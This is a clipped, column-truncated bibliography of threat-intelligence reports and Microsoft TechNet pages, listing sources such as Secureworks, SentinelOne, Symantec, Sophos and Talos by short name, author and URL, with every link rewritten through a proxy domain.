SecureworCTU. (2018,https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
SecureworSecureworkhttps://www.secureworks.com/research/threat-profiles/gold-sahara
SecureworSecureworkhttps://www.secureworks.com/research/threat-profiles/gold-southfield
SecureworkSecureworkhttps://www.secureworks.com/blog/revil-the-gandcrab-connection
SecureworkSecureworkhttps://www.secureworks.com/research/threat-profiles/gold-prelude
SecureworkSecureworkhttp://www.secureworks.com/research/threat-profiles/iron-hemlock
SecureworkSecureworkhttp://www.secureworks.com/research/threat-profiles/iron-hunter
SecureworkSecureworks https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector
SecureworkSecureworkhttps://www.secureworks.com/research/threat-profiles/iron-ritual
SecureworkSecureworkhttps://www.secureworks.com/blog/usaid-themed-phishing-campaign-leverages-us-elections-lure
SecureworkSecureworkhttps://www.secureworks.com/research/threat-profiles/iron-tilden
SecureworkSecureworkhttps://www.secureworks.com/research/iron-twilight-supports-active-measures
SecureworkSecureworkhttps://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector
SecureworSecureworkhttps://www.secureworks.com/research/mcmd-malware-analysis
SecureworkCounter Thhttps://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransom
SecureworkCounter Thhttps://www.secureworks.com/research/revil-sodinokibi-ransomware
Securing baMathew Bran http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hid
Security AfPaganini, Phttps://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html
Security AfPaganini, Phttp://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ong
Security AfPaganini, Phttps://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html
Security I Villadsen, https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/
Segurança Pedro Tavar https://seguranca-informatica.pt/threat-analysis-the-emergent-ursa-trojan-impacts-many-countries-usin
Sekoia RacQuentin Bou https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
Sekoia RacPierre Le B https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/
SensePost Stalmans, Ehttps://sensepost.com/blog/2017/outlook-forms-and-shells/
SensePost Stalmans, https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
SensePost SensePost.https://github.com/sensepost/ruler
Sentinel L Walter, J. https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/
SentinelLa Walter, J. https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/
SentinelLa Ehrlich, A https://assets.sentinelone.com/sentinellabs22/metador#page=1
SentinelLa SentinelLabhttps://docs.google.com/document/d/1e9ZTW9b71YwFWS_18ZwDAxa-cYbV8q1wUefmKZLYVsA/edit#h
SentinelLabPhil Stokeshttps://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
SentinelOnAmitai Benhttps://assets.sentinelone.com/sentinellabs/evol-agrius
SentinelOnChen, Joey.https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly
SentinelOnStokes, P. https://www.sentinelone.com/blog/macos-cuckoo-stealer-ensuring-detection-and-defense-as-new-sam
SentinelO Kremez, V. https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/
SentinelOnPirozzi, A. https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-fo
SentinelOnGuerrero-Shttps://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack
SentinelO SentinelOne https://www.sentinelone.com/anthology/inc-ransom/
SentinelOnStokes, P. https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platf
SentinelO Stokes, P. https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macm
SentinelO Phil Stoke https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macm
SentinelOnGuerrero-Sa https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attack
SentinelOnMilenkoski,https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructu
SentinelOnReaves, J. https://assets.sentinelone.com/labs/sentinel-one-valak-i
SentinelOnTom Hegel.https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/
Seqrite Do Seqrite. (n https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
Session MaOWASP Chea https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html
Shlayer ja Jaron Brad https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/
Slowik Sa Joseph Slow https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm/
SocGholishAndrew Nort https://www.proofpoint.com/us/blog/threat-insight/part-1-socgholish-very-real-threat-very-fake-updat
Sofacy DeaFalcone, R https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-europe
Sofacy KomDani Creus,https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
Softpedia Cimpanu, Chttps://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-ha
Sogeti CERSogeti. (2 https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf
SolarWindsSudhakar Rhttps://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
Sood and Aditya Soohttps://www.techtarget.com/searchsecurity/feature/Targeted-Cyber-Attacks
Sophos BlaBrandt, An https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-b
Sophos GooSzappanos,https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/
Sophos MaBrandt, A. https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-techn
Sophos NeSzappanos,https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-acto
Sophos New Sean Gallaghttps://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/
Sophos Ra SophosLabshttps://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dod
Sophos Sa Palotay, D https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-
Sophos ZerWyke, J. (2https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf
SourceForgRootkit Hunhttp://rkhunter.sourceforge.net
SpecterOpsSchroeder,https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Ow
SpectorOpsGraeber, M. https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
Splunk SupStoner, J. https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.htm
StarBlizzar Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/12/07/star-blizzard-increases-sophistication-and-
StealthbitsJeff Warrenhttps://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
Stewart 20Stewart, A.https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading
Suspected Luke Jenkinhttps://www.mandiant.com/resources/russian-targeting-gov-business
Sygnia Ele Sygnia Inc https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hst
Sygnia EmpBiderman, https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group
Symantec Symantec Shttps://www.symantec.com/blogs/election-security/apt28-espionage-military-government
Symantec Florio, E. https://www.symantec.com/connect/blogs/malware-update-windows-update
Symantec BStama, D.. http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2
Symantec BSponchioni,https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99
Symantec BSymantec Shttps://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache
Symantec BDiMaggio, Jhttps://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/m
Symantec BLadley, F. https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99
Symantec Symantec Shttp://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong
Symantec Kamble, V. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime
Symantec CPantig, J. https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/20
Symantec CBalanza, M.https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040
Symantec CSymantec Se https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-east
Symantec CSymantec. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-h
Symantec Symantec. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage
Symantec DThreat Hunt https://symantec-enterprise-blogs.security.com/threat-intelligence/apt-attacks-telecoms-africa-mgbot
Symantec DThreat Hunt https://symantec-enterprise-blogs.security.com/threat-intelligence/daggerfly-espionage-updated-toolse
Symantec Hayashi, K https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99
Symantec DSymantec Se https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocume
Symantec DSymantec Se https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers
Symantec DSymantec Se http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-eme
Symantec EO'Gorman,https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/m
Symantec ESecurity Rehttps://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
Symantec ESymantec. https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor
(
Symantec FSymantec Thttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor
Symantec FBingham, J.https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door
Symantec GSymantec Shttps://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group
Symantec HLelli, A. ( https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99
Symantec HFitzgerald, https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer
Symantec ISymantec. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-b
Symantec LSymantec Shttps://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east
Symantec LZhou, R. (2https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99
Symantec Symantec Dhttps://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group
Symantec NNeville, A. https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99
Symantec Ladley, F. https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99
Symantec Symantec Se https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia
Symantec OSymantec Se https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf
Symantec Threat Int https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espion
Symantec Mullaney, https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99
Symantec Hamada, J..http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governme
Symantec Symantec Thttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware
Symantec Symantec Shttp://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec
Symantec RLadley, F. https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99
Symantec SHatch, B. ( https://www.symantec.com/connect/articles/ssh-and-ssh-agent
Symantec Symantec Shttp://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory
Symantec SMoench, B.https://www.symantec.com/security-center/writeup/2016-081923-2700-99
Symantec Symantec. https://www.symantec.com/connect/blogs/shamoon-attacks
Symantec Symantec. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espio
Symantec Symantec Shttps://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and
Symantec SDiMaggio, Jhttp://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates
Symantec SDiMaggio, Jhttp://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks
Symantec SSymantec Thttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-
Symantec TSecurity Rehttps://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
Symantec TDiMaggio, Jhttps://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan
Symantec TSymantec Th https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain
Symantec TSymantec Se https://www.symantec.com/connect/blogs/trojanhydraq-incident
Symantec USymantec Thttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Symantec Zhou, R. (2https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99
Symantec Yagi, J. (2 https://web.archive.org/web/20181126143456/https://www.symantec.com/security-center/writeup/20
Symantec Symantec Shttps://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duq
Symantec W Symantec Thhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
Symantec Symantec. https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=wate
(
Symantec Symantec Dhttps://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments
Symantec W Symantec. https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore
(
Symantec Zhou, R. ( https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99
Sysdig Kin Huang, K. (https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/
TCC macOSPhil Stokeshttps://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-desig
TCG TrusteTrusted Cohttp://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_0429
Talent-JumChen, T. a https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/
Talos AgenBrumaghin,https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html
Talos Biso Warren Merchttps://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
Talos Biso Mercer, W.,https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
Talos CCle Brumaghin,http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
Talos CobaSvajcer, V. https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
Talos CobaMavis, N. ( https://web.archive.org/web/20210219195905/https://talos-intelligence-site.s3.amazonaws.com/produ
Talos EmotBrumaghin,https://blog.talosintelligence.com/2019/01/return-of-emotet.html
Talos Fran Adamitis, Dhttps://blog.talosintelligence.com/2019/06/frankenstein-campaign.html
Talos Grav Mercer, W.,https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html
Talos GrouMercer, W.,https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
Talos KimsAn, J and Mhttps://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html
Talos KonnRascagnerehttps://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html
Talos LokibMuhammad, https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html
I
Talos ManjAsheer Malh https://blog.talosintelligence.com/manjusaka-offensive-framework/
Talos Micr Rascagneres https://blog.talosintelligence.com/2017/06/palestine-delphi.html
Talos MuddMalhortra,https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
Talos Mud Adamitis, https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html
Talos Nav Mercer, W.https://blog.talosintelligence.com/2018/05/navrat.html
Talos Nyet Chiu, A. ( https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
Talos Obli Malhotra, https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html
Talos OlymMercer, W.https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
Talos Poet Mercer, W,https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html
Talos Poet Mercer, W.https://blog.talosintelligence.com/2020/10/poetrat-update.html
Talos PromMercer, W.https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
Talos ROK Mercer, W.,https://blog.talosintelligence.com/2017/04/introducing-rokrat.html
Talos ROKRMercer, W.https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html
Talos RemcBrumaghin,https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html
Talos RockLiebenberghttps://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html
Talos SamSVentura, V.https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html
Talos SeduMercer, W.,https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
Talos SmokBaker, B., https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html#more
Talos SodinCadieux, P,https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html
Talos Tea Darin Smithhttps://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html
Talos Tiny Cisco Talo https://blog.talosintelligence.com/2021/09/tinyturla.html
Talos Tran Malhotra, https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html
Talos Zeus Brumaghin,https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More
Talos ZxSheAllievi, A. https://blogs.cisco.com/security/talos/opening-zxshell
Tarrask sc Microsoft Thttps://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defen
TechNet ApMicrosoft. https://technet.microsoft.com/en-us/library/ee791851.aspx
TechNet ArMicrosoft. https://technet.microsoft.com/en-us/library/bb490864.aspx
TechNet AtMicrosoft. https://technet.microsoft.com/en-us/library/bb490866.aspx
TechNet CerMicrosoft. https://technet.microsoft.com/library/cc732443.aspx
TechNet C Microsoft. https://technet.microsoft.com/en-us/library/bb490880.aspx
TechNet C Microsoft. https://technet.microsoft.com/en-us/library/bb490886.aspx
TechNet CrLich, B. (2 https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard
TechNet CrMicrosoft. https://technet.microsoft.com/en-us/library/dn535501.aspx
TechNet DeMicrosoft. https://technet.microsoft.com/en-us/library/cc771049.aspx
TechNet DiMicrosoft. https://technet.microsoft.com/en-us/library/cc755121.aspx
TechNet D Microsoft. https://technet.microsoft.com/en-us/library/cc732952.aspx
TechNet FiMicrosoft. https://technet.microsoft.com/en-us/library/cc700828.aspx
TechNet LeaMicrosoft. https://technet.microsoft.com/en-us/library/dn487450.aspx
TechNet MNunez, N. https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploi
TechNet NeMicrosoft. https://technet.microsoft.com/bb490716.aspx
TechNet NeMicrosoft. https://technet.microsoft.com/library/bb490939.aspx
TechNet NeMicrosoft. https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx
TechNet NeMicrosoft. https://technet.microsoft.com/en-us/library/bb490947.aspx
TechNet PiMicrosoft. https://technet.microsoft.com/en-us/library/bb490968.aspx
TechNet R Microsoft. https://technet.microsoft.com/en-us/library/cc731150.aspx
TechNet R Microsoft. https://technet.microsoft.com/en-us/library/cc732713.aspx
TechNet ReMicrosoft. https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx
TechNet Sch Microsoft. https://technet.microsoft.com/library/dn221960.aspx
TechNet ScMicrosoft. https://technet.microsoft.com/en-us/library/bb490996.aspx
TechNet ScMicrosoft. https://technet.microsoft.com/library/cc938799.aspx
TechNet SeMicrosoft. https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-bo
TechNet SeMicrosoft. https://technet.microsoft.com/library/jj852168.aspx
TechNet SyMicrosoft. https://technet.microsoft.com/en-us/library/bb491007.aspx
TechRepublSchauland,https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/
Technet NeMicrosoft. https://technet.microsoft.com/bb490717.aspx
